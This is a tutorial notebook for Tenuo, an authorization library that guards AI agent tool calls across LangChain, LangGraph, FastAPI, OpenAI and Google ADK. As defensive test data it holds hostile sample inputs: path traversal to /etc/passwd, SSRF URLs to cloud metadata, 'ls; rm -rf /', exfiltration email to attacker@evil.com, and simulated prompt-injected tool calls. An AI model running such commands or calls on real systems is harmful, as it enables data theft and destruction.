# Tenuo Framework Integrations

Secure your AI agents at every layer. This notebook demonstrates Tenuo's integrations with:

1. **LangChain** - Protect tools from prompt injection
2. **LangGraph** - Secure multi-agent workflows  
3. **FastAPI** - Zero-trust API protection
4. **OpenAI** - Direct API guardrails with Subpath, UrlSafe & Shlex
5. **Google ADK** - Callback-based guardrails for Google's Agent Development Kit

**The key insight:** The same warrant that authorizes an LLM to call a tool also authorizes the API call that tool makes. End-to-end cryptographic authorization.

**New to Tenuo?** Start with [Core Concepts](https://colab.research.google.com/github/tenuo-ai/tenuo/blob/main/notebooks/tenuo_demo.ipynb) first.

[GitHub](https://github.com/tenuo-ai/tenuo) | [Docs](https://tenuo.dev)

In [ ]:
# Install dependencies (latest versions)
# Note: Quotes required for zsh compatibility
%pip install -q "tenuo[langchain,langgraph]" fastapi httpx google-adk

In [ ]:
# Define tools (one safe, one dangerous)
from langchain_core.tools import tool

@tool
def read_file(path: str) -> str:
    """Read a file."""
    return f"Contents of {path}"

@tool
def delete_file(path: str) -> str:
    """Delete a file - DANGEROUS!"""
    return f"🔥 DELETED {path}!"

print("✓ Tools defined: read_file, delete_file")

In [ ]:
# Cell 3: The magic - warrant only allows read_file
from tenuo import Warrant, SigningKey, Pattern
from tenuo.langchain import guard

# Create a warrant that ONLY allows read_file
key = SigningKey.generate()
warrant = (Warrant.mint_builder()
    .tool("read_file")
    .capability("read_file", path=Pattern("*"))  # Any path
    .holder(key.public_key)
    .mint(key)
)
bound = warrant.bind(key)

# Wrap BOTH tools with the limited warrant
protected = guard([read_file, delete_file], bound)

print("Warrant allows: ['read_file'] only")
print("\n" + "="*50)

# ✅ This works
print("\n1. read_file('/data/report.txt'):")
print(f"   ✅ {protected[0].invoke({'path': '/data/report.txt'})}")

# ❌ This is blocked (even if LLM tries via prompt injection!)
print("\n2. delete_file('/etc/passwd'):")
try:
    protected[1].invoke({"path": "/etc/passwd"})
except Exception as e:
    print(f"   🛡️ BLOCKED: {type(e).__name__}")
    print(f"   → The LLM can be prompt-injected. The warrant says no.")

---

## What Just Happened?

1. We defined two tools: `read_file` (safe) and `delete_file` (dangerous)
2. We created a **warrant** that only authorizes `read_file`
3. We wrapped **both** tools with `guard()`
4. When `delete_file` was called, Tenuo blocked it—**regardless of what the LLM wanted**

**This is the key insight:** The LLM can hallucinate. It can be prompt-injected. It can "want" to delete files. But the warrant says `read_file` only, and that's enforced cryptographically.

---

# Deep Dive: Full Framework Integrations

Now let's see how this works with real LangChain agents, LangGraph workflows, and FastAPI APIs.

In [ ]:
# Setup for deeper examples
from tenuo import Warrant, SigningKey, KeyRegistry

orchestrator_key = SigningKey.generate()  # High-privilege "admin"
worker_key = SigningKey.generate()        # Limited agent worker

# Register key so TenuoToolNode can find it by ID
registry = KeyRegistry.get_instance()
registry.register("worker-1", worker_key)

# Add another tool
@tool
def send_email(to: str, subject: str, body: str) -> str:
    """Send an email to anyone."""
    return f"Email sent to {to}"

all_tools = [read_file, delete_file, send_email]
print("✓ Keys set up, tools:", [t.name for t in all_tools])

In [ ]:
# LangChain: Wrapping all tools with a limited warrant
from tenuo import Pattern
from tenuo.langchain import guard

limited_warrant = (Warrant.mint_builder()
    .tool("read_file")
    .capability("read_file", path=Pattern("*"))  # Any path
    .holder(orchestrator_key.public_key)
    .mint(orchestrator_key)
)
bound = limited_warrant.bind(orchestrator_key)
protected_tools = guard(all_tools, bound)

print(f"Protected {len(protected_tools)} tools, warrant allows: {list(limited_warrant.capabilities.keys())}")

In [ ]:
# Test 1: Allowed - read_file is in the warrant
print("1. Calling read_file (allowed):")
try:
    result = protected_tools[0].invoke({"path": "/tmp/safe.txt"})
    print(f"   ✅ {result}\n")
except Exception as e:
    print(f"   ❌ {e}\n")

# Test 2: Blocked - delete_file is NOT in the warrant  
print("2. Calling delete_file (blocked):")
try:
    result = protected_tools[1].invoke({"path": "/etc/passwd"})
    print(f"   ✅ {result}\n")
except Exception as e:
    print(f"   🛡️ BLOCKED: {type(e).__name__}\n")

# Test 3: Blocked - send_email is NOT in the warrant
print("3. Calling send_email (blocked):")
try:
    result = protected_tools[2].invoke({
        "to": "attacker@evil.com", 
        "subject": "Secrets",
        "body": "API keys..."
    })
    print(f"   ✅ {result}")
except Exception as e:
    print(f"   🛡️ BLOCKED: {type(e).__name__}")

### Multi-Mission Pattern with LangChain

Real agents handle **multiple missions** in a session. Each mission gets a purpose-specific warrant—if one is compromised, attackers can't pivot to other missions.



In [ ]:
from tenuo import Warrant, SigningKey, Pattern
from tenuo.langchain import guard
from tenuo.templates import FileReader  # Pre-built template!

# Create mission-specific warrants for the SAME worker
worker_key = SigningKey.generate()
orchestrator_key = SigningKey.generate()

# Mission A: Research (read-only) - using FileReader template
file_cap = FileReader.in_directory("/data")  # Returns Capability with path constraint
research_warrant = (Warrant.mint_builder()
    .tool(file_cap.tool)
    .capability(file_cap.tool, **file_cap.constraints)
    .holder(worker_key.public_key)
    .ttl(300)
    .mint(orchestrator_key)
)

# Mission B: Cleanup (delete files) - constraints required for critical tools!
cleanup_warrant = (Warrant.mint_builder()
    .tool("delete_file")
    .capability("delete_file", path=Pattern("/tmp/*"))  # path constraint satisfies critical tool check
    .holder(worker_key.public_key)
    .ttl(60)  # Very short TTL for dangerous ops
    .mint(orchestrator_key)
)

print("📋 Mission warrants created:")
print(f"   📖 Research: {file_cap} (from FileReader template)")
print(f"   🗑️ Cleanup: delete_file, path=/tmp/*, TTL=1min")



In [ ]:
# Wrap tools with MISSION-SPECIFIC warrants
research_tools = guard([read_file, delete_file], research_warrant.bind(worker_key))
cleanup_tools = guard([read_file, delete_file], cleanup_warrant.bind(worker_key))

print("🔬 RESEARCH MISSION (read-only warrant):\n")

# Research can read
print("   read_file('/data/report.txt'):")
print(f"   ✅ {research_tools[0].invoke({'path': '/data/report.txt'})}")

# Research CANNOT delete (wrong mission!)
print("\n   delete_file('/tmp/old.log'):")
try:
    research_tools[1].invoke({"path": "/tmp/old.log"})
    print("   ⚠️ ALLOWED (unexpected)")
except Exception as e:
    print(f"   🛡️ BLOCKED: {type(e).__name__}")
    print("   → Research warrant cannot delete files")

print("\n" + "="*50)
print("\n🗑️ CLEANUP MISSION (delete-only warrant):\n")

# Cleanup can delete
print("   delete_file('/tmp/old.log'):")
print(f"   ✅ {cleanup_tools[1].invoke({'path': '/tmp/old.log'})}")

# Cleanup CANNOT read (wrong mission!)
print("\n   read_file('/data/secrets.txt'):")
try:
    cleanup_tools[0].invoke({"path": "/data/secrets.txt"})
    print("   ⚠️ ALLOWED (unexpected)")
except Exception as e:
    print(f"   🛡️ BLOCKED: {type(e).__name__}")
    print("   → Cleanup warrant cannot read files")



**Why this matters:**

| If attacker compromises... | They can... | They cannot... |
|---------------------------|-------------|----------------|
| Research warrant | Read files for 5 min | Delete anything |
| Cleanup warrant | Delete files for 1 min | Read secrets |

Each mission is isolated. Warrants expire quickly. Blast radius is minimized.

---



### Pre-Built Templates: The Easy Way

Instead of manually constructing capabilities with `Pattern("...")`, use Tenuo's **built-in templates** for common scenarios:



In [ ]:
from tenuo.templates import (
    FileReader,      # Read-only file access
    FileWriter,      # Write access (use with caution)
    WebSearcher,     # HTTP/API access
    DatabaseReader,  # Read-only DB queries
    EmailSender,     # Email sending
    CommonAgents,    # Pre-built agent patterns
)

print("📁 FileReader templates:")
print(f"   .in_directory('/data')     → {FileReader.in_directory('/data')}")
print(f"   .exact_file('/config.json') → {FileReader.exact_file('/config.json')}")
print(f"   .extensions('/docs', ['.md']) → {FileReader.extensions('/docs', ['.md'])}")

print("\n🌐 WebSearcher templates:")
print(f"   .domains(['api.openai.com']) → {WebSearcher.domains(['api.openai.com'])}")
print(f"   .read_only(['news.api.com']) → {WebSearcher.read_only(['news.api.com'])}")

print("\n📊 DatabaseReader templates:")
print(f"   .tables(['users', 'orders']) → {DatabaseReader.tables(['users', 'orders'])}")
print(f"   .with_row_limit(['logs'], 100) → {DatabaseReader.with_row_limit(['logs'], 100)}")

print("\n📧 EmailSender templates:")
print(f"   .to_domains(['company.com']) → {EmailSender.to_domains(['company.com'])}")



In [ ]:
# Using templates with mint() - cleaner than manual Pattern/Exact construction
from tenuo import configure, mint, SigningKey

configure(issuer_key=SigningKey.generate(), dev_mode=True)

async def demo_templates():
    # ✅ Clean: Use FileReader template
    async with mint(FileReader.in_directory("/data/reports")) as warrant:
        print(f"📁 Created warrant for: {warrant.tools}")
        print(f"   Constrained to: /data/reports/*")
    
    # ✅ Composite: Pre-built agent pattern
    research_agent = CommonAgents.research_assistant(
        search_domains=["arxiv.org", "scholar.google.com"],
        output_dir="/tmp/research"
    )
    async with mint(*research_agent) as warrant:
        print(f"\n🔬 Research Agent capabilities:")
        for tool in warrant.tools:
            print(f"   • {tool}")

await demo_templates()



**Available Templates:**

| Category | Templates | Example |
|----------|-----------|---------|
| **File System** | `FileReader`, `FileWriter` | `.in_directory()`, `.exact_file()`, `.extensions()` |
| **Database** | `DatabaseReader`, `DatabaseWriter` | `.tables()`, `.with_row_limit()`, `.insert_only()` |
| **Web/API** | `WebSearcher`, `ApiClient` | `.domains()`, `.read_only()`, `.openai()` |
| **Code** | `CodeRunner`, `ShellExecutor` | `.python_safe()`, `.allowed_commands()` |
| **Email** | `EmailSender` | `.to_domains()`, `.to_recipients()` |
| **Composite** | `CommonAgents` | `.research_assistant()`, `.data_analyst()`, `.code_assistant()` |

```python
from tenuo.templates import FileReader, CommonAgents
```

---



## 2. LangGraph: Secure Multi-Agent Workflows

`TenuoToolNode` is a drop-in replacement for LangGraph's `ToolNode`. It automatically verifies warrants before executing any tool call.

In [ ]:
from typing import Annotated, TypedDict, List
import operator
from langchain_core.messages import BaseMessage, AIMessage
from langgraph.graph import StateGraph, END
from tenuo.langgraph import TenuoToolNode

# Agent state only needs messages - no warrant pollution!
class AgentState(TypedDict):
    messages: Annotated[List[BaseMessage], operator.add]

# Build a simple graph: entry -> tools -> end
workflow = StateGraph(AgentState)
workflow.add_node("tools", TenuoToolNode(all_tools))  # Drop-in secure!
workflow.set_entry_point("tools")
workflow.add_edge("tools", END)

graph = workflow.compile()
print("✓ Secure graph compiled")

Now let's see how TenuoToolNode blocks unauthorized tool calls:


In [ ]:
# Simulate prompt injection: LLM tries to call delete_file
worker_warrant = (Warrant.mint_builder()
    .tool("read_file")
    .capability("read_file", path=Pattern("*"))
    .holder(worker_key.public_key)
    .mint(worker_key)
)

malicious_tool_call = AIMessage(
    content="",
    tool_calls=[{"name": "delete_file", "args": {"path": "/etc/passwd"}, "id": "call_1"}]
)

config = {
    "configurable": {
        "tenuo_key_id": "worker-1",
        "tenuo_warrant": str(worker_warrant)  # str() returns base64
    }
}

print("🎯 Simulated prompt injection attack:")
print("   LLM requested: delete_file('/etc/passwd')")
print("   Warrant allows: ['read_file'] only\n")

result = graph.invoke({"messages": [malicious_tool_call]}, config=config)
print("Result:", result["messages"][-1].content)

## 3. FastAPI: Zero-Trust API Protection

`TenuoGuard` is a FastAPI dependency that verifies warrants and PoP signatures on incoming requests. Perfect for securing the APIs that your agents call.

In [ ]:
from fastapi import FastAPI, Depends
from fastapi.testclient import TestClient
from tenuo.fastapi import configure_tenuo, TenuoGuard, SecurityContext

api = FastAPI()
configure_tenuo(api)  # Sets up error handlers

@api.get("/files/{path:path}")
def get_file(
    path: str,
    ctx: SecurityContext = Depends(TenuoGuard("read_file"))  # Requires read_file authority
):
    return {"path": path, "content": "...", "authorized": True}

client = TestClient(api)
print("✓ FastAPI app with TenuoGuard ready")


In [ ]:
# Create a client warrant with read_file permission
client_warrant = (Warrant.mint_builder()
    .tool("read_file")
    .capability("read_file", path=Pattern("*"))
    .holder(orchestrator_key.public_key)
    .mint(orchestrator_key)
)
client_bound = client_warrant.bind(orchestrator_key)

# Generate auth headers (automatically signs PoP for read_file)
headers = client_bound.headers("read_file", {"path": "config.json"})
print("Generated headers:")
for k, v in headers.items():
    print(f"  {k}: {v[:40]}..." if len(v) > 40 else f"  {k}: {v}")

# Make authorized request
print("\nMaking request...")
response = client.get("/files/config.json", headers=headers)
print(f"Status: {response.status_code}")
print(f"Response: {response.json()}")


In [ ]:
# Try with tampered signature (simulating MITM attack)
print("Attempting request with tampered signature...")
bad_headers = headers.copy()
bad_headers["X-Tenuo-PoP"] = "tampered_signature_12345"

response = client.get("/files/config.json", headers=bad_headers)
print(f"Status: {response.status_code} (Forbidden)")
print(f"Error: {response.json()['detail']}")


## 4. OpenAI: Direct API Guardrails

Tenuo wraps the OpenAI client directly, protecting tool calls at the API level. Two modes:

- **Tier 1: GuardBuilder** - Runtime guardrails without cryptography (quick start)
- **Tier 2: Warrants** - Full cryptographic authorization with PoP

Plus three **security constraints** designed for LLM agents:
- `Subpath` - Blocks path traversal attacks (`../etc/passwd`)
- `UrlSafe` - Blocks SSRF attacks (private IPs, cloud metadata)
- `Shlex` - Blocks shell injection attacks (`ls; rm -rf /`)


In [ ]:
# Mock OpenAI client (no API key needed for demo)
from dataclasses import dataclass

class MockOpenAI:
    """Simulates OpenAI client returning tool calls."""
    class chat:
        class completions:
            @staticmethod
            def create(**kwargs):
                @dataclass
                class Function:
                    name: str
                    arguments: str
                @dataclass
                class ToolCall:
                    id: str
                    function: Function
                @dataclass
                class Message:
                    role: str = "assistant"
                    content: str = None
                    tool_calls: list = None
                @dataclass
                class Choice:
                    message: Message
                @dataclass
                class Response:
                    choices: list
                
                # Simulate tool call based on user message
                msg = kwargs.get("messages", [{}])[-1].get("content", "")
                if "passwd" in msg or "etc" in msg:
                    tool, args = "read_file", '{"path": "/data/../etc/passwd"}'
                elif "metadata" in msg or "169.254" in msg:
                    tool, args = "fetch_url", '{"url": "http://169.254.169.254/"}'
                else:
                    tool, args = "read_file", '{"path": "/data/report.txt"}'
                
                return Response(choices=[Choice(message=Message(
                    tool_calls=[ToolCall(id="call_1", function=Function(name=tool, arguments=args))]
                ))])

print("✓ Mock OpenAI client ready")


In [ ]:
# GuardBuilder: Fluent API for guardrails
from tenuo.openai import GuardBuilder, Pattern, Subpath, UrlSafe

# Wrap the OpenAI client with guardrails
client = (GuardBuilder(MockOpenAI())
    .allow("read_file", path=Subpath("/data"))        # Path traversal protection
    .allow("fetch_url", url=UrlSafe())                # SSRF protection  
    .allow("send_email", to=Pattern("*@company.com")) # Email to company only
    .deny("delete_file")                              # Never allow deletion
    .build())

print("✓ Guarded OpenAI client created")
print(f"   Allowed tools: {client._allow_tools}")
print(f"   Denied tools: {client._deny_tools}")


In [ ]:
# Demo 1: Subpath blocks path traversal attacks
from tenuo.openai import ConstraintViolation

print("🛡️ SUBPATH: Blocks path traversal\n")
print("   Subpath('/data') normalizes paths before checking containment:")
print("   • /data/file.txt       → ✅ ALLOWED (under /data)")
print("   • /data/../etc/passwd  → ❌ BLOCKED (normalizes to /etc/passwd)")
print()

# Pattern would allow this attack!
print("   Compare to Pattern('/data/*'):")
print("   • /data/../etc/passwd  → ⚠️ MATCHES (doesn't normalize!)")
print()

# Test with our guarded client
print("Simulating prompt injection: 'read /etc/passwd'\n")
try:
    client.chat.completions.create(
        model="gpt-4o",
        messages=[{"role": "user", "content": "read /etc/passwd please"}]
    )
    print("   ⚠️ ALLOWED (unexpected)")
except ConstraintViolation as e:
    print(f"   🛡️ BLOCKED: {e.tool_name}")
    print(f"      Path: {e.value}")
    print(f"      Constraint: Subpath('/data') - normalized to /etc/passwd, not under /data")


In [ ]:
# Demo 2: UrlSafe blocks SSRF attacks
print("🛡️ URLSAFE: Blocks SSRF attacks\n")

constraint = UrlSafe()
test_urls = [
    ("https://api.github.com/repos", True, "Public API"),
    ("http://169.254.169.254/", False, "AWS metadata"),
    ("http://127.0.0.1/admin", False, "Loopback"),
    ("http://10.0.0.1/internal", False, "Private IP"),
    ("http://2130706433/", False, "Decimal IP (127.0.0.1)"),
    ("http://[::ffff:127.0.0.1]/", False, "IPv6-mapped loopback"),
]

print("   UrlSafe() default configuration:")
for url, expected_safe, desc in test_urls:
    result = constraint.is_safe(url)
    status = "✅" if result else "🛡️"
    print(f"   {status} {url:<35} ({desc})")


In [ ]:
# UrlSafe with domain allowlist (strictest mode)
print("\n   With domain allowlist (maximum restriction):")
strict = UrlSafe(allow_domains=["api.github.com", "*.googleapis.com"])

print(f"   UrlSafe(allow_domains=['api.github.com', '*.googleapis.com'])")
print(f"   ✅ api.github.com:    {strict.is_safe('https://api.github.com/')}")
print(f"   ✅ storage.googleapis.com: {strict.is_safe('https://storage.googleapis.com/')}")
print(f"   🛡️ evil.com:          {strict.is_safe('https://evil.com/')}")


### OpenAI Security Constraints Summary

| Constraint | Protects Against | Example Attack Blocked |
|------------|------------------|----------------------|
| `Subpath("/data")` | Path traversal | `/data/../etc/passwd` |
| `UrlSafe()` | SSRF | `http://169.254.169.254/` (cloud metadata) |
| `UrlSafe(allow_domains=[...])` | Any external URL | Domain allowlist only |
| `Shlex(allow=["ls"])` | Shell injection | `ls; rm -rf /` |
| `Pattern("*@company.com")` | Email exfiltration | `attacker@evil.com` |

**Tier 1 vs Tier 2:**

| Tier | Setup | Crypto | Best For |
|------|-------|--------|----------|
| **Tier 1: GuardBuilder** | Inline constraints | ❌ | Quick hardening, prototyping |
| **Tier 2: Warrants** | Control plane issues | ✅ PoP | Production, multi-agent, audit |

For Tier 2 with full cryptographic authorization, see [OpenAI docs](https://tenuo.dev/openai).

---


## 5. Google ADK: Callback-Based Guardrails

Google's Agent Development Kit (ADK) uses a callback system for tool execution. Tenuo's `TenuoGuard` integrates via `before_tool_callback` to enforce authorization before any tool runs.

**Key features:**
- `GuardBuilder` for fluent configuration
- `protect_agent()` for zero-config setup
- Tool filtering based on warrant capabilities
- Skill mapping when tool names differ from warrant skills


In [ ]:
# Real Google ADK tools and Agent
# Set GOOGLE_API_KEY to use real LLM-powered agent, otherwise uses test harness

import os
from google.adk.tools import FunctionTool, ToolContext
from google.adk import Agent
from typing import Dict, Any, Optional, Callable, List
from dataclasses import dataclass

# Check for API key
HAS_API_KEY = bool(os.environ.get("GOOGLE_API_KEY"))

# ============================================================================
# REAL ADK TOOLS - These are actual google.adk.tools.FunctionTool instances
# ============================================================================

def read_file(path: str) -> str:
    """Read contents of a file at the given path."""
    return f"Contents of {path}"

def delete_file(path: str) -> str:
    """Delete a file at the given path. DANGEROUS!"""
    return f"Deleted {path}"

def fetch_url(url: str) -> str:
    """Fetch content from a URL."""
    return f"Fetched {url}"

# These are REAL Google ADK FunctionTool instances
read_tool = FunctionTool(read_file)
delete_tool = FunctionTool(delete_file)
fetch_tool = FunctionTool(fetch_url)

print("Google ADK FunctionTools (real):")
print(f"   Type: {type(read_tool).__module__}.{type(read_tool).__name__}")
for t in [read_tool, delete_tool, fetch_tool]:
    print(f"   - {t.name}: {t.description}")

# ============================================================================
# AGENT - Real if GOOGLE_API_KEY set, otherwise test harness
# ============================================================================

if HAS_API_KEY:
    print("\nGOOGLE_API_KEY found - will use real google.adk.Agent")
else:
    print("\nNo GOOGLE_API_KEY - using test harness (set key for real LLM agent)")

@dataclass
class TestHarness:
    """
    Test harness for running without API key.
    Mirrors google.adk.Agent's before_tool_callback behavior exactly.
    """
    name: str
    tools: List[FunctionTool]
    before_tool_callback: Optional[Callable] = None
    
    def run_tool(self, tool_name: str, args: Dict[str, Any]) -> str:
        """Execute tool with callback check (same as real ADK Agent)."""
        tool = next((t for t in self.tools if t.name == tool_name), None)
        if not tool:
            raise ValueError(f"Tool {tool_name} not found")
        
        # Callback invocation identical to real google.adk.Agent
        if self.before_tool_callback:
            result = self.before_tool_callback(tool, args, None)
            if result is not None:
                return f"BLOCKED: {result}"
        
        return tool._func(**args)


In [ ]:
# TenuoGuard with GuardBuilder - the recommended pattern
from tenuo import Warrant, SigningKey, Subpath, UrlSafe
from tenuo.google_adk import GuardBuilder as ADKGuardBuilder

# Create warrant for the agent
agent_key = SigningKey.generate()
control_key = SigningKey.generate()

agent_warrant = (Warrant.mint_builder()
    .capability("read_file", path=Subpath("/data"))
    .capability("fetch_url", url=UrlSafe(allow_domains=["api.github.com"]))
    .holder(agent_key.public_key)
    .ttl(300)
    .mint(control_key)
)

# Create TenuoGuard with the warrant
guard = (ADKGuardBuilder()
    .with_warrant(agent_warrant, agent_key)
    .on_denial("raise")  # or "log" for development
    .build())

print("TenuoGuard created with warrant:")
print(f"   Capabilities: {list(agent_warrant.capabilities.keys())}")
print(f"   Constraints:")
print(f"      read_file.path: Subpath('/data')")
print(f"      fetch_url.url:  UrlSafe(allow_domains=['api.github.com'])")


In [ ]:
# Tool filtering: only expose tools the warrant allows
all_adk_tools = [read_tool, delete_tool, fetch_tool]
allowed_tools = guard.filter_tools(all_adk_tools)

print("Tool filtering:")
print(f"   All tools:     {[t.name for t in all_adk_tools]}")
print(f"   After filter:  {[t.name for t in allowed_tools]}")
print(f"   Removed:       delete_file (not in warrant)")

# Create agent - real ADK Agent if API key available, otherwise test harness
if HAS_API_KEY:
    # Real google.adk.Agent with LLM
    agent = Agent(
        name="SecureAgent",
        model="gemini-2.0-flash",
        tools=allowed_tools,
        before_tool_callback=guard.before_tool
    )
    print(f"\nReal google.adk.Agent created with {len(allowed_tools)} tools")
else:
    # Test harness (same callback behavior, no LLM needed)
    agent = TestHarness(
        name="SecureAgent",
        tools=allowed_tools,
        before_tool_callback=guard.before_tool
    )
    print(f"\nTestHarness created with {len(agent.tools)} tools")


In [ ]:
# Demo: Constraint enforcement via before_tool_callback
print("Testing constraint enforcement:\n")

# Test 1: Allowed - path under /data
print("1. read_file('/data/report.txt'):")
try:
    result = agent.run_tool("read_file", {"path": "/data/report.txt"})
    if "BLOCKED" in result:
        print(f"   {result}")
    else:
        print(f"   OK: {result}")
except Exception as e:
    print(f"   BLOCKED: {type(e).__name__}")

# Test 2: Blocked - path traversal attack
print("\n2. read_file('/data/../etc/passwd'):")
try:
    result = agent.run_tool("read_file", {"path": "/data/../etc/passwd"})
    if "BLOCKED" in result:
        print(f"   BLOCKED (path traversal)")
    else:
        print(f"   OK: {result}")
except Exception as e:
    print(f"   BLOCKED: {type(e).__name__} - Subpath normalized to /etc/passwd")

# Test 3: Allowed - URL in domain allowlist
print("\n3. fetch_url('https://api.github.com/repos'):")
try:
    result = agent.run_tool("fetch_url", {"url": "https://api.github.com/repos"})
    if "BLOCKED" in result:
        print(f"   {result}")
    else:
        print(f"   OK: {result}")
except Exception as e:
    print(f"   BLOCKED: {type(e).__name__}")

# Test 4: Blocked - SSRF attempt
print("\n4. fetch_url('http://169.254.169.254/'):")
try:
    result = agent.run_tool("fetch_url", {"url": "http://169.254.169.254/"})
    if "BLOCKED" in result:
        print(f"   BLOCKED (AWS metadata SSRF)")
    else:
        print(f"   OK: {result}")
except Exception as e:
    print(f"   BLOCKED: {type(e).__name__} - UrlSafe blocks private IPs")


### Google ADK Integration Summary

| Feature | Method | Description |
|---------|--------|-------------|
| **Tool filtering** | `guard.filter_tools(tools)` | Removes tools not in warrant |
| **Callback guard** | `guard.before_tool` | Validates constraints before execution |
| **Skill mapping** | `.map_skill("tool", "skill")` | Maps tool names to warrant skills |
| **Zero-config** | `protect_agent(agent, warrant, key)` | One-liner setup |

**ADK vs OpenAI patterns:**

| Aspect | OpenAI | Google ADK |
|--------|--------|------------|
| Integration point | Client wrapper | `before_tool_callback` |
| Tool filtering | N/A (LLM decides) | `filter_tools()` removes unauthorized |
| Constraint check | Response interception | Callback return value |

For more details, see [Google ADK docs](https://tenuo.dev/google-adk).

---


## Summary

You've seen how Tenuo secures the **four layers** of AI agent architecture:

| Layer | Integration | What it does |
|-------|-------------|--------------|
| **LLM API** | `GuardBuilder` | Blocks dangerous tool calls before execution |
| **Tool calls** | `guard()` | Blocks unauthorized LangChain tool invocations |
| **Agent graphs** | `TenuoToolNode` | Verifies warrants before any tool execution |
| **Network APIs** | `TenuoGuard` | Zero-trust verification of incoming requests |

**Security constraints for LLM agents:**

| Constraint | Blocks |
|------------|--------|
| `Subpath("/data")` | Path traversal (`../etc/passwd`) |
| `UrlSafe()` | SSRF (private IPs, metadata, IP encoding bypasses) |
| `Shlex(allow=["ls"])` | Shell injection (`ls; rm -rf /`) |

**The key insight:** A single warrant flows through all layers. The orchestrator issues it, the agent carries it, and the API verifies it. End-to-end cryptographic authorization.

### Next Steps

- 🔐 [Core Concepts Notebook](https://colab.research.google.com/github/tenuo-ai/tenuo/blob/main/notebooks/tenuo_demo.ipynb) - Warrants, delegation, attenuation
- 📖 [Documentation](https://tenuo.dev)
- 🐙 [GitHub](https://github.com/tenuo-ai/tenuo) - Source & examples

---

### 🔍 [Tenuo Explorer](https://tenuo.dev/explorer/)

Decode, build, and test warrants visually in your browser. Paste any warrant to see its structure, test authorization, or generate Python/Rust code.
